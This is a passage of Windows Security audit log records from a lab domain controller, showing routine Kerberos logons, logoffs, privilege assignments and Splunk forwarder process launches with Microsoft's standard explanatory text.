- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:21:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264577
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833EC1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264580
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264582
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x130c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264581
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf48
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264583
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x41c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264585
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264584
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264586
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x149c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264592
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836E50
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264591
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x836E50
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53476
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264590
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836E50
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264589
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836DE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264588
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x836DE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53475
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264587
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x836DE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264595
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x837B39
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264594
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x837B39
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53484
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:22:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264593
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x837B39
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:23:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264596
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe04
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264598
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264597
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264599
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264601
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264600
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:23:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264602
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1534
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
